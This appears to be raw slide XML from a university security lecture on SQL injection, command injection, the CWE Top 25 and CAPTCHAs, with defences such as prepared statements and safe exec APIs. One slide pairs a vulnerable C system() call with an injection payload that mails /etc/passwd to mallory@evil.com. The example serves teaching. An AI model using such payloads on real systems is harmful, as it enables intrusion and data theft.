            <a:ext cx="6703200" cy="1108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func handleGetItems(w http.ResponseWriter, r *http.Request) {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itemName := r.URL.Query()["item"][0]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db := getDB()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row, err := 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db.QueryRow("SELECT name, price FROM items WHERE name = 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?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", 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itemName</a:t>
            </a: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...</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="B7B7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 Defenses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p5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Biggest downside to prepared statements: Not part of the SQL standard!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Instead, SQL drivers rely on the actual SQL implementation (e.g. MySQL, PostgreSQL, etc.) to implement prepared statements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Must rely on the API to correctly convert the prepared statement into implementation-specific protocol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Again: Consider human factors!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488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Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Google Shape;494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Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="Google Shape;500;p60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Untrusted data being treated incorrectly is not a SQL-specific problem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Can happen in other languages too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Consider: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 dirty="0"/>
              <a:t> function in C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The function takes a string as input, spawns a shell, and executes the string input as a command in the shell</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Google Shape;501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6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/>
              <a:t> Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Google Shape;507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508" name="Google Shape;508;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="954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void find_employee(char *regex) {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char cmd[512];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snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);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system(cmd);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9" name="Google Shape;509;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775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grep '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weaver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' phonebook.txt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10" name="Google Shape;510;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450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regex = "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weaver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"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11" name="Google Shape;511;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="125552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Handler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="Google Shape;512;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250"/>
            <a:ext cx="106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513" name="Google Shape;513;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="183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/>
              <a:t> Command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="514" name="Google Shape;514;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3407900" y="2207800"/>
            <a:ext cx="2253600" cy="1307400"/>
            <a:chOff x="3407900" y="2207800"/>
            <a:chExt cx="2253600" cy="1307400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="515" name="Google Shape;515;p61"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3407900" y="3115000"/>
              <a:ext cx="2253600" cy="400200"/>
            </a:xfrm>
            <a:prstGeom prst="rect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String manipulation again!</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="516" name="Google Shape;516;p61"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="515" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="4218200" y="2207800"/>
              <a:ext cx="316500" cy="907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25 Most Dangerous Software Weaknesses (2020)</a:t>
            </a:r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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="123" name="Google Shape;123;p24"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="412300" y="1239875"/>
          <a:ext cx="7714500" cy="3816950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{CC577D0C-167A-49ED-8727-562A38F614A0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="535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5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6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Rank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ID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Name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Score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6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[1]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3"/>
                        </a:rPr>
                        <a:t>CWE-79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Improper Neutralization of Input During Web Page Generation (’Cross-site Scripting’)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46.82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08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[2]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4"/>
                        </a:rPr>
                        <a:t>CWE-787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Out-of-bounds Write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46.17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[3]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5"/>
                        </a:rPr>
                        <a:t>CWE-20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Improper Input Validation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33.47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[4]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6"/>
                        </a:rPr>
                        <a:t>CWE-125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Out-of-bounds Read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26.50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[5]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7"/>
                        </a:rPr>
                        <a:t>CWE-119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Improper Restriction of Operations within the Bounds of a Memory Buffer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23.73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27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[6]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8"/>
                        </a:rPr>
                        <a:t>CWE-89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Improper Neutralization of Special Elements used in an SQL Command (’SQL Injection’)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20.69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[7]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9"/>
                        </a:rPr>
                        <a:t>CWE-200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Exposure of Sensitive Information to an Unauthorized Actor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19.16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[8]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0"/>
                        </a:rPr>
                        <a:t>CWE-416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Use After Free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18.87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[9]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1"/>
                        </a:rPr>
                        <a:t>CWE-352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Cross-Site Request Forgery (CSRF)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17.29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27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[10]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2"/>
                        </a:rPr>
                        <a:t>CWE-78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Improper Neutralization of Special Elements used in an OS Command (’OS Command Injection’)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16.44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[11]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3"/>
                        </a:rPr>
                        <a:t>CWE-190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Integer Overflow or Wraparound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15.81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[12]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4"/>
                        </a:rPr>
                        <a:t>CWE-22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Improper Limitation of a Pathname to a Restricted Directory (’Path Traversal’)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13.67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[13]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5"/>
                        </a:rPr>
                        <a:t>CWE-476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NULL Pointer Dereference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8.35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[14]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6"/>
                        </a:rPr>
                        <a:t>CWE-287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Improper Authentication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8.17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[15]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7"/>
                        </a:rPr>
                        <a:t>CWE-434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Unrestricted Upload of File with Dangerous Type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7.38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[16]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8"/>
                        </a:rPr>
                        <a:t>CWE-732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Incorrect Permission Assignment for Critical Resource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6.95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3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[17]</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="1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solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId19"/>
                        </a:rPr>
                        <a:t>CWE-94</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="sng">
                        <a:solidFill>
                          <a:schemeClr val="hlink"/>
                        </a:solidFill>
                      </a:endParaRPr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Improper Control of Generation of Code (’Code Injection’)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6.53</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="27425" marB="27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/>
              <a:t> Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;522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523" name="Google Shape;523;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="1655725"/>
            <a:ext cx="6703200" cy="9543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void find_employee(char *regex) {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char cmd[512];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snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);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system(cmd);</a:t>
            </a:r>
            <a:endParaRPr sz="10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4" name="Google Shape;524;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4533775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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>grep '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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'; mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1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mallory@evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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&lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0" err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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="10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/passwd; touch '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:endParaRPr sz="10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5" name="Google Shape;525;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3556450"/>
            <a:ext cx="6703200" cy="338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regex = "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'; mail mallory@evil.com &lt; /etc/passwd; touch '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"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6" name="Google Shape;526;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="125552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Handler</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Google Shape;527;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="3156250"/>
            <a:ext cx="1065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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Google Shape;528;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1220400" y="4133575"/>
            <a:ext cx="183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/>
              <a:t> Command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Defending Against Command Injection in General</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Google Shape;534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535" name="Google Shape;535;p63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Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Input sanitization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As before, this is hard to implement and difficult to get 100% correct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Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Use safe APIs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For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 dirty="0"/>
              <a:t>, executing a shell to execute a command is too powerful!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dirty="0"/>
              <a:t>Instead, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>execv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, which directly executes the program with arguments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>without parsing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Most programming languages have safe APIs that should be use instead of parsing untrusted input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 dirty="0"/>
              <a:t> (unsafe) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>execv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (safe) in C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b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (unsafe) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>subprocess.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (safe) in Python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b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>exec.Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> (safe) in Go</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Go only has the safe version!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CAPTCHAs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Google Shape;541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Websites are for Humans</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Google Shape;547;p6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websites are designed for human usage, not robot usage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Example: A login page is for users to submit their password, not for an attacker to automate a brute-force attack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Robot access of websites can lead to attacks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Denial of service: Overwhelming a web server by flooding it with requests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We’ll see more denial-of-service later in the networking unit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Spam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specific exploitation (e.g. scalping tickets/graphics cards when they go on sale)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Google Shape;54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CAPTCHAs: Definition</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Google Shape;554;p66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/>
              <a:t>CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: A challenge that is easy for a human to solve, but hard for a computer to solve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“Completely Automated Public Turing test to tell Computers and Humans Apart”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Sometimes called a “reverse Turing test”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Used to distinguish web requests made by humans and web requests made by robots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Usage: Administer a CAPTCHA, and if it passes, assume that the user is human and allow access</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555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CAPTCHAs: Examples</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p67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Reading distorted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Identifying images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Listening to an audio clip and typing out the words spoken</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Google Shape;562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pic>
        <p:nvPicPr>
          <p:cNvPr id="563" name="Google Shape;563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0075" y="1318450"/>
            <a:ext cx="3053225" cy="1356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3413" y="2774869"/>
            <a:ext cx="2826557" cy="1994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570" name="Google Shape;570;p6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CAPTCHAs and Machine Learning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;p6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Modern CAPTCHAs have another purpose: Training machine learning algorithms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Machine learning often requires manually-labeled datasets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CAPTCHAs crowdsource human power to help manually label these big datasets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Example: Machine vision problems require manually-labeled examples: “This is a stop sign”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="572" name="Google Shape;57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1273" y="1490825"/>
            <a:ext cx="2037451" cy="294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586" name="Google Shape;586;p70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CAPTCHAs: Issues</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Google Shape;587;p70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Arms race: As computer algorithms get smarter, CAPTCHAs need to get harder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Accessibility: As CAPTCHAs get harder, not all humans are able to solve them easily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Ambiguity: CAPTCHAs might be so hard that the validator doesn’t know the solution either!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all bots are bad: CAPTCHAs can distinguish bots from humans, but not good bots from bad bots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Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>Crawler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> bots help archive webpages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="588" name="Google Shape;588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6138" y="1463125"/>
            <a:ext cx="1843650" cy="110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4272" y="3602047"/>
            <a:ext cx="2847375" cy="74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9788" y="2680685"/>
            <a:ext cx="2596349" cy="94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12413" y="4415728"/>
            <a:ext cx="2231108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sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p71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CAPTCHAs: Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Google Shape;598;p71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Outsourcing attack: Pay humans to solve CAPTCHAs for you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CAPTCHAs only verify that there is a human in the loop; everything else can be automated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Usually costs a few cents per CAPTCHA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CAPTCHAs end up just distinguishing which attackers are willing to spend money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dirty="0"/>
              <a:t>Remember: Security is economics!</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="599" name="Google Shape;59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1100" y="1887079"/>
            <a:ext cx="2445075" cy="248509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00" name="Google Shape;600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1574" y="1907063"/>
            <a:ext cx="2722424" cy="244512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606" name="Google Shape;606;p72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Injection: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Google Shape;607;p72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Web servers interact with databases to store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Web servers use SQL to interact with databases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 injection: Untrusted input is used as parsed SQL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attacker can construct their own queries to run on the SQL server!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Blind SQL injection: SQLi with little to no feedback from the SQL query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Defense: Input sanitization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Difficult to implement correctly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Defense: Prepared statements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Data only ever treated as data; bulletproof!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Command injection: Untrusted input is used as any parsed language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Defense: Keep it simple and use safe API calls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Web Services</a:t>
            </a:r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websites need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>store and retrieve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Examples: User accounts, comments, prices, etc.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HTTP server only handles the HTTP requests, and it needs to have some way of storing and retrieving persisted data</a:t>
            </a:r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sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Google Shape;613;p73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CAPTCHAs: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Google Shape;614;p73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CAPTCHA: A challenge that is easy for a human to solve, but hard for a computer to solve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Examples: Reading distorted text, identifying images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Original purpose: Distinguishing between humans and bots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Modern purpose: Forces the attacker to spend some money to solve the CAPTCHAs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Modern purpose: Providing training data for machine learning algorithms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Issues with CAPTCHAs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 computer algorithms get smarter, CAPTCHAs get harder, and not all humans are able to solve them easily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Ambiguity: CAPTCHAs might be so hard that the validator doesn't know the solution either!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Economics: Breaking CAPTCHAs just costs money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all bots are bad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of Web Services</a:t>
            </a:r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37" name="Google Shape;137;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="542150" y="1655125"/>
            <a:ext cx="1562700" cy="3008100"/>
            <a:chOff x="542150" y="1655125"/>
            <a:chExt cx="1562700" cy="3008100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="138" name="Google Shape;138;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="542150" y="1655125"/>
              <a:ext cx="1562700" cy="3008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/>
                <a:t>Client</a:t>
              </a:r>
              <a:endParaRPr b="1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Handle HTML, CSS, JavaScript, etc.</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="139" name="Google Shape;139;p26" descr="Chrome Logo, Chrome Symbol, Meaning, History and Evolution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97125" y="3421041"/>
              <a:ext cx="620200" cy="505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26" descr="Firefox - Wikipedia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426294" y="3421041"/>
              <a:ext cx="536331" cy="505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1" name="Google Shape;141;p26" descr="Microsoft Edge - Wikipedia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4644" y="4036616"/>
              <a:ext cx="505150" cy="505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26" descr="Brave Browser Review: Can it Topple Chrome and Safari? - Crypto Radar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441887" y="4036616"/>
              <a:ext cx="505149" cy="505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3" name="Google Shape;143;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3790650" y="1655125"/>
            <a:ext cx="1562700" cy="3008100"/>
            <a:chOff x="3790650" y="1655125"/>
            <a:chExt cx="1562700" cy="3008100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="144" name="Google Shape;144;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3790650" y="1655125"/>
              <a:ext cx="1562700" cy="3008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/>
                <a:t>Web Server</a:t>
              </a:r>
              <a:endParaRPr b="1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Process requests and handle server-side logic</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="145" name="Google Shape;145;p2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142226" y="3494954"/>
              <a:ext cx="859545" cy="3282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26" descr="File:Nginx logo.svg - Wikimedia Commons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4142229" y="3949478"/>
              <a:ext cx="859550" cy="18176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26" descr="IIS - The Process Cannot Access the File Because it is Being Used by Another Process - Scott Brady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4142213" y="4257474"/>
              <a:ext cx="859549" cy="3687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8" name="Google Shape;148;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7039150" y="1655125"/>
            <a:ext cx="1562700" cy="3008100"/>
            <a:chOff x="7039150" y="1655125"/>
            <a:chExt cx="1562700" cy="3008100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149" name="Google Shape;149;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7039150" y="1655125"/>
              <a:ext cx="1562700" cy="3008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/>
                <a:t>Database Server</a:t>
              </a:r>
              <a:endParaRPr b="1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Store and provide access to persistent data</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="150" name="Google Shape;150;p26" descr="MySQL Logo - PNG e Vetor - Download de Logo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7137747" y="3549184"/>
              <a:ext cx="620199" cy="4223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26" descr="PostgreSQL - Wikipedia, la enciclopedia libre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7883050" y="3440175"/>
              <a:ext cx="620200" cy="640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26" descr="Microsoft SQL server Logo PNG Transparent &amp; SVG Vector - Freebie Supply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7137747" y="4125241"/>
              <a:ext cx="620200" cy="5013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" name="Google Shape;153;p26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7883048" y="4292263"/>
              <a:ext cx="620201" cy="1673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4" name="Google Shape;154;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2191600" y="2301475"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="2191600" y="2301475"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="155" name="Google Shape;155;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2191600" y="2640175"/>
              <a:ext cx="15021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56" name="Google Shape;156;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2191600" y="2301475"/>
              <a:ext cx="1502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2. HTTP GET request</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3820950" y="2301475"/>
            <a:ext cx="1502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3. Interpret request</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5445200" y="2301475"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="5445200" y="2301475"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="159" name="Google Shape;159;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5445200" y="2640175"/>
              <a:ext cx="15021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60" name="Google Shape;160;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5445200" y="2301475"/>
              <a:ext cx="1502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4. Query database</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5445200" y="2880725"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="5445200" y="2880725"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="162" name="Google Shape;162;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5445200" y="3219425"/>
              <a:ext cx="15021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63" name="Google Shape;163;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5445200" y="2880725"/>
              <a:ext cx="1502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5. Return data</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3820950" y="2880725"/>
            <a:ext cx="1502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6. Construct response</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p26"/>
